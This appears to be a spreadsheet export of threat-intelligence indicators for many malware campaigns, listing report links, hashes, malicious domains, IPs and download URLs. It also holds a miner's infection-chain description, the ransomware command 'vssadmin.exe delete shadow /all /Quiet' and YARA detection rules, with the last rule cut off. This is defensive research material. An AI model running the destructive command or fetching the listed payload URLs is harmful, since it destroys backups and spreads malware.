  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware</t>
  </si>
  <si>
    <t>1527097621</t>
  </si>
  <si>
    <t>https://www.us-cert.gov/ncas/current-activity/2018/05/23/VPNFilter-Destructive-Malware</t>
  </si>
  <si>
    <t>https://community.netgear.com/t5/General-WiFi-Routers/VPNfilter-Malware-Number-NetGear-Devices-Potentially-Affected/m-p/1576024</t>
  </si>
  <si>
    <t>1556174740</t>
  </si>
  <si>
    <t>1556174817</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html</t>
  </si>
  <si>
    <t>DNSpionage brings out the Karkoff</t>
  </si>
  <si>
    <t>1556174812</t>
  </si>
  <si>
    <t>2fa19292f353b4078a9bf398f8837d991e383c99e147727eaa6a03ce0259b3c5</t>
  </si>
  <si>
    <t>e398dac59f604d42362ffe8a2947d4351a652516ebfb25ddf0838dd2c8523be8</t>
  </si>
  <si>
    <t>5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c</t>
  </si>
  <si>
    <t>6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11</t>
  </si>
  <si>
    <t>b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04</t>
  </si>
  <si>
    <t>cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5</t>
  </si>
  <si>
    <t>coldfart.com</t>
  </si>
  <si>
    <t>rimrun.com</t>
  </si>
  <si>
    <t>kuternull.com</t>
  </si>
  <si>
    <t>108.62.141.247</t>
  </si>
  <si>
    <t>1600365333</t>
  </si>
  <si>
    <t>1600365503</t>
  </si>
  <si>
    <t>8a863b5f154e1ddba695453fdd0f5b83d9d555bae6cf377963c9009c9fa6c9be</t>
  </si>
  <si>
    <t>Scan Order List.xlsm</t>
  </si>
  <si>
    <t>Epic Manchego â€“ atypical maldoc delivery brings flurry of infostealers</t>
  </si>
  <si>
    <t>8857fae198acd87f7581c7ef7227c34d</t>
  </si>
  <si>
    <t>1600365382</t>
  </si>
  <si>
    <t>7d71f885128a27c00c4d72bf488cd7cc</t>
  </si>
  <si>
    <t>2nd stage crefgyu.exe</t>
  </si>
  <si>
    <t>c40fa887be0159016f3afd43a3bdec6d11078e19974b60028b93def1c2f95726</t>
  </si>
  <si>
    <t>1600365418</t>
  </si>
  <si>
    <t>551b5dd7aff4ee07f98d11aac910e174</t>
  </si>
  <si>
    <t>New order _2608.xlsm</t>
  </si>
  <si>
    <t>45cab564386a568a4569d66f6781c6d0b06a9561ae4ac362f0e76a8abfede7bb</t>
  </si>
  <si>
    <t>1600365465</t>
  </si>
  <si>
    <t>rule xlsm_without_metadata_and_with_date {_x005F_x000D_
    meta:_x005F_x000D_
        description = "Identifies .xlsm files created with EPPlus"_x005F_x000D_
        author = "NVISO (Didier Stevens)"_x005F_x000D_
        date = "2020-07-12"_x005F_x000D_
        reference = "http://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers"_x005F_x000D_
        tlp = "White"_x005F_x000D_
    strings:_x005F_x000D_
        $opc = "[Content_Types].xml"_x005F_x000D_
        $ooxml = "xl/workbook.xml"_x005F_x000D_
        $vba = "xl/vbaProject.bin"_x005F_x000D_
        $meta1 = "docProps/core.xml"_x005F_x000D_
        $meta2 = "docProps/app.xml"_x005F_x000D_
        $timestamp = {50 4B 03 04 ?? ?? ?? ?? ?? ?? 00 00 21 00}_x005F_x000D_
    condition:_x005F_x000D_
        uint32be(0) == 0x504B0304 and ($opc and $ooxml and $vba)_x005F_x000D_
        and not (any of ($meta*) and $timestamp)_x005F_x000D_
}</t>
  </si>
  <si>
    <t>https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/</t>
  </si>
  <si>
    <t>1533276276</t>
  </si>
  <si>
    <t>1533276306</t>
  </si>
  <si>
    <t>tamboresdelcomahue.com.ar</t>
  </si>
  <si>
    <t>Fake Maersk shipping notice phishing</t>
  </si>
  <si>
    <t>http://tamboresdelcomahue.com.ar/files/bill.php</t>
  </si>
  <si>
    <t>482984a5dcd82e820233571fb5598d9fb653e202f5a95e9d1c0d2c241a045e8b</t>
  </si>
  <si>
    <t>ea1c5fb6f452f56d11b5a2e778e7a20b</t>
  </si>
  <si>
    <t>1533276297</t>
  </si>
  <si>
    <t>https://www.virustotal.com/#/file/482984a5dcd82e820233571fb5598d9fb653e202f5a95e9d1c0d2c241a045e8b/details</t>
  </si>
  <si>
    <t>1583062670</t>
  </si>
  <si>
    <t>1583062701</t>
  </si>
  <si>
    <t>protonvpn.store</t>
  </si>
  <si>
    <t>AZORult spreads as a fake ProtonVPN installer</t>
  </si>
  <si>
    <t>cc2477cf4d596a88b349257cba3ef356</t>
  </si>
  <si>
    <t>573ff02981a5c70ae6b2594b45aa7caa</t>
  </si>
  <si>
    <t>c961a3e3bd646ed0732e867310333978</t>
  </si>
  <si>
    <t>2a98e06c3310309c58fb149a8dc7392c</t>
  </si>
  <si>
    <t>f21c21c2fceac5118ebf088653275b4f</t>
  </si>
  <si>
    <t>0ae37532a7bbce03e7686eee49441c41</t>
  </si>
  <si>
    <t>974b6559a6b45067b465050e5002214b</t>
  </si>
  <si>
    <t>1583062688</t>
  </si>
  <si>
    <t>https://securelist.com/azorult-spreads-as-a-fake-protonvpn-installer/96261/</t>
  </si>
  <si>
    <t>1456948119</t>
  </si>
  <si>
    <t>melon25.ru</t>
  </si>
  <si>
    <t>New Android Trojan â€œXbotâ€ Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom</t>
  </si>
  <si>
    <t>81.94.205.226</t>
  </si>
  <si>
    <t>On port 8021</t>
  </si>
  <si>
    <t>104.219.250.16</t>
  </si>
  <si>
    <t>On port 8022</t>
  </si>
  <si>
    <t>http://52.24.219.3/action.php</t>
  </si>
  <si>
    <t>http://192.227.137.154/request.php</t>
  </si>
  <si>
    <t>http://23.227.163.110/locker.php</t>
  </si>
  <si>
    <t>http://market155.ru/Install.apk</t>
  </si>
  <si>
    <t>http://illuminatework.ru/Install.apk</t>
  </si>
  <si>
    <t>http://yetiathome15.ru/Install.apk</t>
  </si>
  <si>
    <t>http://leeroywork3.co/install.apk</t>
  </si>
  <si>
    <t>http://morning3.ru/install.apk</t>
  </si>
  <si>
    <t>dfda8e52df5ba1852d518220363f81a06f51910397627df6cdde98d15948de65</t>
  </si>
  <si>
    <t>e905d9d4bc59104cfd3fc50c167e0d8b20e4bd40628ad01b701a515dd4311449</t>
  </si>
  <si>
    <t>f2cfbc2f836f3065d5706b9f49f55bbd9c1dae2073a606c8ee01e4bbd223f29f</t>
  </si>
  <si>
    <t>029758783d2f9d8fd368392a6b7fdf5aa76931f85d6458125b6e8e1cadcdc9b4</t>
  </si>
  <si>
    <t>1264c25d67d41f52102573d3c528bcddda42129df5052881f7e98b4a90f61f23</t>
  </si>
  <si>
    <t>20bf4c9d0a84ac0f711ccf34110f526f2b216ae74c2a96de3d90e771e9de2ad4</t>
  </si>
  <si>
    <t>33230c13dcc066e05daded0641f0af21d624119a5bb8c131ca6d2e21cd8edc1a</t>
  </si>
  <si>
    <t>4b5ef7c8150e764cc0782eab7ca7349c02c78fceb1036ce3064d35037913f5b6</t>
  </si>
  <si>
    <t>7e939552f5b97a1f58c2202e1ab368f355d35137057ae04e7639fc9c4771af7e</t>
  </si>
  <si>
    <t>93172b122577979ca41c3be75786fdeefa4b80a6c3df7d821dfecefca1aa6b05</t>
  </si>
  <si>
    <t>a22b55aaf5d35e9bbc48914b92a76de1c707aaa2a5f93f50a2885b0ca4f15f01</t>
  </si>
  <si>
    <t>d082ec8619e176467ce8b8a62c2d2866d611d426dd413634f6f5f5926c451850</t>
  </si>
  <si>
    <t>a94cac6df6866df41abde7d4ecf155e684207eedafc06243a21a598a4b658729</t>
  </si>
  <si>
    <t>58af00ef7a70d1e4da8e73edcb974f6ab90a62fbdc747f6ec4b021c03665366a</t>
  </si>
  <si>
    <t>7e47aaa8a1dda7a413aa38a622ac7d70cc2add1137fdaa7ccbf0ae3d9b38b335</t>
  </si>
  <si>
    <t>d1e5b88d48ae5e6bf1a79dfefa32432b7f14342c2d78b3e5406b93ffef37da03</t>
  </si>
  <si>
    <t>c2354b1d1401e31607c770c6e5b4b26dd0374c19cc54fc5db071e5a5af624ecc</t>
  </si>
  <si>
    <t>12f75b8f58e1a0d88a222f79b2ad3b7f04fd833acb096bb30f28294635b53637</t>
  </si>
  <si>
    <t>1b84e7154efd88ece8d6d79afe5dd7f4cda737b07222405067295091e4693d1b</t>
  </si>
  <si>
    <t>616b13d0a668fd904a60f7e6e18b19476614991c27ef5ed7b86066b28952befc</t>
  </si>
  <si>
    <t>2e2173420c0ec220b831f1c705173c193536277112a9716b6f1ead6f2cad3c9e</t>
  </si>
  <si>
    <t>595fa0c6b7aa64c455682e2f19d174fe4e72899650e63ab75f63d04d1c538c00</t>
  </si>
  <si>
    <t>1531414490</t>
  </si>
  <si>
    <t>1531831810</t>
  </si>
  <si>
    <t>https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/</t>
  </si>
  <si>
    <t>Hawkeye Keylogger - Reborn v8: An in-depth campaign analysis</t>
  </si>
  <si>
    <t>1531414603</t>
  </si>
  <si>
    <t>okipanelhostingpanel.gq</t>
  </si>
  <si>
    <t>stellarball.com</t>
  </si>
  <si>
    <t>stemtopx.com</t>
  </si>
  <si>
    <t>stevemike-fireforce.info</t>
  </si>
  <si>
    <t>http://bit.ly/ASD8239ASdmkWi38AS</t>
  </si>
  <si>
    <t>1531831798</t>
  </si>
  <si>
    <t>http://bit.ly/loadingpleaswaitrr</t>
  </si>
  <si>
    <t>http://bit.ly/Loadingwaitplez</t>
  </si>
  <si>
    <t>d97f1248061353b15d460eb1a4740d0d61d3f2fcb41aa86ca6b1d0ff6990210a</t>
  </si>
  <si>
    <t>23475b23275e1722f545c4403e4aeddf528426fd242e1e5e17726adb67a494e6</t>
  </si>
  <si>
    <t>02070ca81e0415a8df4b468a6f96298460e8b1ab157a8560dcc120b984ba723b</t>
  </si>
  <si>
    <t>79712cc97a19ae7e7e2a4b259e1a098a8dd4bb066d409631fb453b5203c1e9fe</t>
  </si>
  <si>
    <t>452cc04c8fc7197d50b2333ecc6111b07827051be75eb4380d9f1811fa94cbc2</t>
  </si>
  <si>
    <t>95511672dce0bd95e882d7c851447f16a3488fd19c380c82a30927bac875672a</t>
  </si>
  <si>
    <t>1b778e81ee303688c32117c6663494616cec4db13d0dee7694031d77f0487f39</t>
  </si>
  <si>
    <t>12e9b955d76fd0e769335da2487db2e273e9af55203af5421fc6220f3b1f695e</t>
  </si>
  <si>
    <t>12f138e5e511f9c75e14b76e0ee1f3c748e842dfb200ac1bfa43d81058a25a28</t>
  </si>
  <si>
    <t>9dfbd57361c36d5e4bda9d442371fbaa6c32ae0e746ebaf59d4ec34d0c429221</t>
  </si>
  <si>
    <t>f1b58fd2bc8695effcabe8df9389eaa8c1f51cf4ec38737e4fbc777874b6e752</t>
  </si>
  <si>
    <t>5ad6cf87dd42622115f33b53523d0a659308abbbe3b48c7400cc51fd081bf4dd</t>
  </si>
  <si>
    <t>7db8d0ff64709d864102c7d29a3803a1099851642374a473e492a3bc2f2a7bae</t>
  </si>
  <si>
    <t>01538c304e4ed77239fc4e31fb14c47604a768a7f9a2a0e7368693255b408420</t>
  </si>
  <si>
    <t>d7ea3b7497f00eec39f8950a7f7cf7c340cf9bf0f8c404e9e677e7bf31ffe7be</t>
  </si>
  <si>
    <t>ccce59e6335c8cc6adf973406af1edb7dea5d8ded4a956984dff4ae587bcf0a8</t>
  </si>
  <si>
    <t>1531414604</t>
  </si>
  <si>
    <t>c73c58933a027725d42a38e92ad9fd3c9bbb1f8a23b3f97a0dd91e49c38a2a43</t>
  </si>
  <si>
    <t>1684675681</t>
  </si>
  <si>
    <t>1684675846</t>
  </si>
  <si>
    <t>https://securelist.com/minas-miner-on-the-way-to-complexity/109692/</t>
  </si>
  <si>
    <t>Minas – on the way to complexity</t>
  </si>
  <si>
    <t>1684675753</t>
  </si>
  <si>
    <t>PowerShell script runs via the Task Scheduler and downloads the lgntoerr.gif file from a remote server._x005F_x000D_
    The script decrypts lgntoerr.gif, resulting in a .NET DLL, which is then loaded._x005F_x000D_
    The .NET DLL extracts and decrypts three files from its resources: two DLLs and an encrypted payload. The extracted files are placed in the ProgramData directory._x005F_x000D_
    The .NET DLL creates a task to autorun the legitimate ilasm.exe component at system startup via Task Scheduler._x005F_x000D_
    Task Scheduler starts ilasm.exe from the ProgramData directory._x005F_x000D_
    ilasm.exe launches fusion.dll, a malicious DLL hijacker, from the same directory._x005F_x000D_
    fusion.dll loads the second decrypted DLL._x005F_x000D_
    That DLL creates a suspended dllhost.exe process._x005F_x000D_
    It then decrypts the payload from the encrypted binary file._x005F_x000D_
    The decrypted payload is loaded into the dllhost.exe process as a DLL._x005F_x000D_
    The PID of the dllhost.exe process is saved to a file in the ProgramData directory._x005F_x000D_
    The dllhost.exe process passes control to the decrypted payload._x005F_x000D_
    The payload DLL extracts and launches the miner DLL in memory.</t>
  </si>
  <si>
    <t>1684675840</t>
  </si>
  <si>
    <t>08da41489b4b68565dc77bb9acb1ecb4</t>
  </si>
  <si>
    <t>06fe9ab0b17f659486e3c3ace43f0e3a</t>
  </si>
  <si>
    <t>f38a1b6b132afa55ab48b4b7a8986181</t>
  </si>
  <si>
    <t>63e0cd6475214c697c5fc115d40327b4</t>
  </si>
  <si>
    <t>1552583370</t>
  </si>
  <si>
    <t>1552583473</t>
  </si>
  <si>
    <t>https://isc.sans.edu/forums/diary/Malspam+pushes+Emotet+with+Qakbot+as+the+followup+malware/24738/</t>
  </si>
  <si>
    <t>Malspam pushes Emotet with Qakbot as the follow-up malware</t>
  </si>
  <si>
    <t>1552583356</t>
  </si>
  <si>
    <t>9978756e1daf844bd734c6282fec583d5f3089be4e21d7fbd43877d25598f8f6</t>
  </si>
  <si>
    <t>c6ff3a2fd9e623754056a39f379eba289105f0a935dc05249ca1957cf35e84ac</t>
  </si>
  <si>
    <t>ebb4e12bcc3b95e4b8b16798b7c46d24f8b973a210424512d580112534c2012e</t>
  </si>
  <si>
    <t>e6308496a22d317cf7e5a5469351c5cf4dc11ef7e47b39e9a97ea85707cbec8a</t>
  </si>
  <si>
    <t>cf59f0ff182405c068262b1879f559f4244d4e94cc813f900c96c3eb89a59b10</t>
  </si>
  <si>
    <t>http://84.28.185.76/wordpress/iBA/</t>
  </si>
  <si>
    <t>http://45.36.20.17:8443/</t>
  </si>
  <si>
    <t>http://103.39.131.88/</t>
  </si>
  <si>
    <t>http://187.189.195.208:8443/</t>
  </si>
  <si>
    <t>http://174.56.47.59/</t>
  </si>
  <si>
    <t>http://211.63.34.183:443/</t>
  </si>
  <si>
    <t>http://58.171.215.214:8080/</t>
  </si>
  <si>
    <t>https://www.virustotal.com/#/file/ebb4e12bcc3b95e4b8b16798b7c46d24f8b973a210424512d580112534c2012e/behavior</t>
  </si>
  <si>
    <t>https://www.virustotal.com/#/file/c6ff3a2fd9e623754056a39f379eba289105f0a935dc05249ca1957cf35e84ac/</t>
  </si>
  <si>
    <t>https://www.virustotal.com/#/file/9978756e1daf844bd734c6282fec583d5f3089be4e21d7fbd43877d25598f8f6/behavior</t>
  </si>
  <si>
    <t>https://www.virustotal.com/#/file/e6308496a22d317cf7e5a5469351c5cf4dc11ef7e47b39e9a97ea85707cbec8a/behavior</t>
  </si>
  <si>
    <t>1513103497</t>
  </si>
  <si>
    <t>1513103630</t>
  </si>
  <si>
    <t>https://blog.fox-it.com/2017/12/12/criminals-in-a-festive-mood/</t>
  </si>
  <si>
    <t>Criminals in a festive mood</t>
  </si>
  <si>
    <t>1513103624</t>
  </si>
  <si>
    <t>http://partytimeevents.nl/contactgegevens%2012_2017_10_00_.zip</t>
  </si>
  <si>
    <t>compromised website</t>
  </si>
  <si>
    <t>http://stegengaweb.nl/files/contactgegevens%2012_2017_10_00_.zip</t>
  </si>
  <si>
    <t>http://axprofessional.it/onenl.exe</t>
  </si>
  <si>
    <t>https://avimart.ru/3inexowtoqiyzlonyunku.dat</t>
  </si>
  <si>
    <t>https://astronatal.ru/2odirnaogfaugdoxiwoex.dat</t>
  </si>
  <si>
    <t>https://abci.ru/1yhubydnopyakleqinyyx.dat</t>
  </si>
  <si>
    <t>185.224.133.57</t>
  </si>
  <si>
    <t>https://adsfun.club/</t>
  </si>
  <si>
    <t>External panel for injects</t>
  </si>
  <si>
    <t>aefc0fe15836165291cb66eac5ffd177</t>
  </si>
  <si>
    <t>588e31ac96bd6318f787602e87f86b75d4b5537679e11ba5a509589148033275</t>
  </si>
  <si>
    <t>deb9a0aa69270a0b263b80ed13880b24</t>
  </si>
  <si>
    <t>eb65b1d5f5b3ccc263a4984275c084b63b0a262a87d55887d6a4d744a75e4112</t>
  </si>
  <si>
    <t>4ac38a4efa276f8d64c1ed39a53e7ab8</t>
  </si>
  <si>
    <t>e556273db50d4588d7e4b5183d06d39b0ebedbb094fc2a39b59416212c829324</t>
  </si>
  <si>
    <t>1587627419</t>
  </si>
  <si>
    <t>1587628855</t>
  </si>
  <si>
    <t>c893a12ff72698f09f89f778e4c9cd2b</t>
  </si>
  <si>
    <t>TmPfwRVS.dll</t>
  </si>
  <si>
    <t>Newly uncovered DNS tunnelling technique, and new campaign against South Korean gaming company</t>
  </si>
  <si>
    <t>06256946a69409cd18859bfa429184a282374d76</t>
  </si>
  <si>
    <t>df6af36626d375c5e8aff45c64bfc1975d753b109e126a6cb30ee0523550329c</t>
  </si>
  <si>
    <t>1587627555</t>
  </si>
  <si>
    <t>cf140dc4cad9e8216545593a4c08c7be</t>
  </si>
  <si>
    <t>driver1.sys</t>
  </si>
  <si>
    <t>2b319b44451abb0596b9187e06f1fb7b4ace969d</t>
  </si>
  <si>
    <t>bfa8948f72061eded548ef683830de068e438a6eaf2da44e0398a37ac3e26860</t>
  </si>
  <si>
    <t>cc95391d75ce2443740f60114fe30ae9</t>
  </si>
  <si>
    <t>driver2.sys</t>
  </si>
  <si>
    <t>30d1dd1dd4f0ace7a4f2c24e31fb6a0ee33e8a3a</t>
  </si>
  <si>
    <t>8ddc6dd9fc3640cd786dfbc72212cd001d9369817aa69e0a2fa25e29560badcf</t>
  </si>
  <si>
    <t>b4e66b445b39d0368bbe4b91a3cd98ff</t>
  </si>
  <si>
    <t>dsefix.exe</t>
  </si>
  <si>
    <t>2bc358ddc72f59ba0373b8635ab08ad747c12180</t>
  </si>
  <si>
    <t>1865013aaca0f12679e35f06c4dad4e00d6372415ee8390b17b4f910fee1f7a2</t>
  </si>
  <si>
    <t>eaea9ccb40c82af8f3867cd0f4dd5e9d</t>
  </si>
  <si>
    <t>vboxdrv.sys</t>
  </si>
  <si>
    <t>7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c</t>
  </si>
  <si>
    <t>cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986</t>
  </si>
  <si>
    <t>1587628670</t>
  </si>
  <si>
    <t>00961922e22e6a5d30b1d6fbd667d3c4</t>
  </si>
  <si>
    <t>Sample Targeting South Korean Gaming Company</t>
  </si>
  <si>
    <t>0fd54c26b593bd9e9218492d50d8873521c0ec0d</t>
  </si>
  <si>
    <t>4209b457f3b42dd2e1e119f2c9dd5b5fb1d063a77b49c7acbae89bbe4e284fb9</t>
  </si>
  <si>
    <t>https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/</t>
  </si>
  <si>
    <t>1666974612</t>
  </si>
  <si>
    <t>1666986812</t>
  </si>
  <si>
    <t>DiceyF deploys GamePlayerFramework in online casino development studio</t>
  </si>
  <si>
    <t>Scraper: DiceyF deploys GamePlayerFramework in online casino development studio</t>
  </si>
  <si>
    <t>https://securelist.com/feed/</t>
  </si>
  <si>
    <t>Feed URL</t>
  </si>
  <si>
    <t>https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/</t>
  </si>
  <si>
    <t>1666974613</t>
  </si>
  <si>
    <t>%USERPROFILE%\Desktop\Fucker\GamePlayerFramework\Tifa\*.pdb</t>
  </si>
  <si>
    <t>%ALLUSERSPROFILE%\NVIDIA\DisplaySessionContainer1.ini</t>
  </si>
  <si>
    <t>031466c63bba4eafb11f2966e765c0d2</t>
  </si>
  <si>
    <t>07d6bf2df064e97d0e635a67f083f87d</t>
  </si>
  <si>
    <t>0ac4e0e08bd28e88acd4991071c98261</t>
  </si>
  <si>
    <t>cb8a30fcbcb462be66462f6928c6e44a</t>
  </si>
  <si>
    <t>294c22533c950d7d9d74a82729ba3841</t>
  </si>
  <si>
    <t>07ff76be283fb44ce9e9427e12e63aa6</t>
  </si>
  <si>
    <t>56836b19b5c35c81e006f4843ff63e51</t>
  </si>
  <si>
    <t>1666974614</t>
  </si>
  <si>
    <t>19f8809d04c06bba2ad95a937f133a89</t>
  </si>
  <si>
    <t>969ef4a64203ba2ab54a6822559600cc</t>
  </si>
  <si>
    <t>3a1780e6fb6250b0fb63d2884788670e</t>
  </si>
  <si>
    <t>4d72e573d9c4d31371c8020ba7179daf</t>
  </si>
  <si>
    <t>193d192ed0cec2487d18b13aedc94cb6</t>
  </si>
  <si>
    <t>2bd3b84b318beb5714cac9194078607a</t>
  </si>
  <si>
    <t>1d59e527886e4bd72df0f609239b9d58</t>
  </si>
  <si>
    <t>39736c93f7d9cc62cdc00438c174f8a4</t>
  </si>
  <si>
    <t>0c4dae01f21c3d2fa55f38314fe34958</t>
  </si>
  <si>
    <t>06711900cc5d7cd665bc1b6ec9d7eacf</t>
  </si>
  <si>
    <t>ddbc9081ed2c503c5e4512a8e61b5389</t>
  </si>
  <si>
    <t>49b457ee8eaa83b18cc00d2f579824c6</t>
  </si>
  <si>
    <t>quic.flashesplayer.com</t>
  </si>
  <si>
    <t>archivess.imangoim.net</t>
  </si>
  <si>
    <t>202.182.115.238</t>
  </si>
  <si>
    <t>rascustoms.dll</t>
  </si>
  <si>
    <t>45.77.47.149</t>
  </si>
  <si>
    <t>1666986058</t>
  </si>
  <si>
    <t>1666985968</t>
  </si>
  <si>
    <t>cmd.exe</t>
  </si>
  <si>
    <t>1590172385</t>
  </si>
  <si>
    <t>1590520426</t>
  </si>
  <si>
    <t>4d8b1f4acc638080054ffbb4cef2559583a22dc6</t>
  </si>
  <si>
    <t>PowerShell dropper</t>
  </si>
  <si>
    <t>From Agent.BTZ to ComRAT v4</t>
  </si>
  <si>
    <t>1590172389</t>
  </si>
  <si>
    <t>dd7006d16d8e121fce8f2905433474ecced75cc0</t>
  </si>
  <si>
    <t>ComRAT orchestrator</t>
  </si>
  <si>
    <t>1590172393</t>
  </si>
  <si>
    <t>0139818441431c72a1935e7f740a1cc458a63452</t>
  </si>
  <si>
    <t>1590172396</t>
  </si>
  <si>
    <t>0ab87f7bdf7d9e54ba33fe715c11e275d5dcce15</t>
  </si>
  <si>
    <t>1590172431</t>
  </si>
  <si>
    <t>%TEMP%\FXSAPIDebugTrace.txt</t>
  </si>
  <si>
    <t>Virtual File System</t>
  </si>
  <si>
    <t>%TEMP%\iecache.bin</t>
  </si>
  <si>
    <t>1590172456</t>
  </si>
  <si>
    <t>(HKLM|HKCU)\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\</t>
  </si>
  <si>
    <t>{59031A47-3F72-44A7-80C5-5595FE6B30EE}</t>
  </si>
  <si>
    <t>HKLM\SOFTWARE\Microsoft\SQMClient\Windows.WSqmCons</t>
  </si>
  <si>
    <t>1590172476</t>
  </si>
  <si>
    <t>arinas.tk</t>
  </si>
  <si>
    <t>bedrost.com</t>
  </si>
  <si>
    <t>branter.tk</t>
  </si>
  <si>
    <t>1590172477</t>
  </si>
  <si>
    <t>bronerg.tk</t>
  </si>
  <si>
    <t>celestyna.tk</t>
  </si>
  <si>
    <t>crusider.tk</t>
  </si>
  <si>
    <t>davilta.tk</t>
  </si>
  <si>
    <t>deme.ml</t>
  </si>
  <si>
    <t>dixito.ml</t>
  </si>
  <si>
    <t>duke6.tk</t>
  </si>
  <si>
    <t>elizabi.tk</t>
  </si>
  <si>
    <t>foods.jkub.com</t>
  </si>
  <si>
    <t>hofa.tk</t>
  </si>
  <si>
    <t>hunvin.tk</t>
  </si>
  <si>
    <t>lakify.ml</t>
  </si>
  <si>
    <t>lindaztert.net</t>
  </si>
  <si>
    <t>misters.ml</t>
  </si>
  <si>
    <t>pewyth.ga</t>
  </si>
  <si>
    <t>progress.zyns.com</t>
  </si>
  <si>
    <t>sameera.gq</t>
  </si>
  <si>
    <t>sanitar.ml</t>
  </si>
  <si>
    <t>scrabble.ikwb.com</t>
  </si>
  <si>
    <t>sumefu.gq</t>
  </si>
  <si>
    <t>umefu.gq</t>
  </si>
  <si>
    <t>vefogy.cf</t>
  </si>
  <si>
    <t>vylys.com</t>
  </si>
  <si>
    <t>wekanda.tk</t>
  </si>
  <si>
    <t>1590416795</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf</t>
  </si>
  <si>
    <t>ESET WhitePaper</t>
  </si>
  <si>
    <t>1559937241</t>
  </si>
  <si>
    <t>1561442743</t>
  </si>
  <si>
    <t>185.254.190.200</t>
  </si>
  <si>
    <t>Gate domain that redirected to Rig EK</t>
  </si>
  <si>
    <t>Rig Exploit Kit sends Pitou.B Trojan</t>
  </si>
  <si>
    <t>makemoneyeasywith.me</t>
  </si>
  <si>
    <t>188.225.26.48</t>
  </si>
  <si>
    <t>Rig EK traffic</t>
  </si>
  <si>
    <t>195.154.255.65</t>
  </si>
  <si>
    <t>Encoded/encrypted traffic caused by the Pitou.B Trojan</t>
  </si>
  <si>
    <t>9c569f5e6dc2dd3cf1618588f8937513669b967f52b3c19993237c4aa4ac58ea</t>
  </si>
  <si>
    <t>Flash exploit sent by Rig EK on 2019-06-24</t>
  </si>
  <si>
    <t>835873504fdaa37c7a6a2df33828a3dcfc95ef0a2ee7d2a078194fd23d37cf64</t>
  </si>
  <si>
    <t>Pitou.B malware sent by Rig EK on 2019-06-24</t>
  </si>
  <si>
    <t>1459025771</t>
  </si>
  <si>
    <t>1459025819</t>
  </si>
  <si>
    <t>b9bf3131acae056144b070c21ed45623ce979eb3</t>
  </si>
  <si>
    <t>Ad Serving Platform Used By PUA Also Delivers Magnitude Exploit Kit</t>
  </si>
  <si>
    <t>paidpop.link</t>
  </si>
  <si>
    <t>1459025818</t>
  </si>
  <si>
    <t>http://bestsendmoney.org/</t>
  </si>
  <si>
    <t>1523028505</t>
  </si>
  <si>
    <t>1523028549</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/</t>
  </si>
  <si>
    <t>New MacOS Backdoor Linked to OceanLotus Found</t>
  </si>
  <si>
    <t>1523028543</t>
  </si>
  <si>
    <t>ssl.arkouthrie.com</t>
  </si>
  <si>
    <t>s3.hiahornber.com</t>
  </si>
  <si>
    <t>widget.shoreoa.com</t>
  </si>
  <si>
    <t>2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a</t>
  </si>
  <si>
    <t>4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4</t>
  </si>
  <si>
    <t>673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f</t>
  </si>
  <si>
    <t>1680024143</t>
  </si>
  <si>
    <t>1680024388</t>
  </si>
  <si>
    <t>https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel</t>
  </si>
  <si>
    <t>DarkBit Ransomware Targets Israel with Command-Line Options and Optimized Encryption Routines</t>
  </si>
  <si>
    <t>1680024208</t>
  </si>
  <si>
    <t>RECOVERY_DARKBIT.txt</t>
  </si>
  <si>
    <t>1680024258</t>
  </si>
  <si>
    <t>vssadmin.exe delete shadow /all /Quiet</t>
  </si>
  <si>
    <t>1680024277</t>
  </si>
  <si>
    <t>http://iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad.onion/support</t>
  </si>
  <si>
    <t>Social network</t>
  </si>
  <si>
    <t>twitter-id</t>
  </si>
  <si>
    <t>1680024300</t>
  </si>
  <si>
    <t>@DarkBitTW</t>
  </si>
  <si>
    <t>1680024331</t>
  </si>
  <si>
    <t>rule Darkbit_Ransomware {_x005F_x000D_
meta:_x005F_x000D_
        description = "Yara rule based of the DarkBit Ransomware code"_x005F_x000D_
        author = "The BlackBerry Research &amp; Intelligence team"_x005F_x000D_
        date = "2023-02-14"_x005F_x000D_
        last_modified = "2023-02-15"_x005F_x000D_
        distribution = "TLP:White"_x005F_x000D_
        version = "1.0"_x005F_x000D_
        sha256 = "9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff"_x005F_x000D_
        md5 = "9880fae6551d1e9ee921f39751a6f3c0"_x005F_x000D_
_x005F_x000D_
strings:_x005F_x000D_
        $4538285_63 = { 9? 9? 9? 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? C6 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? 66 ?? E8 ?? ?? ?? ?? 48 ?? ?? 84 ?? 0F 85 }_x005F_x000D_
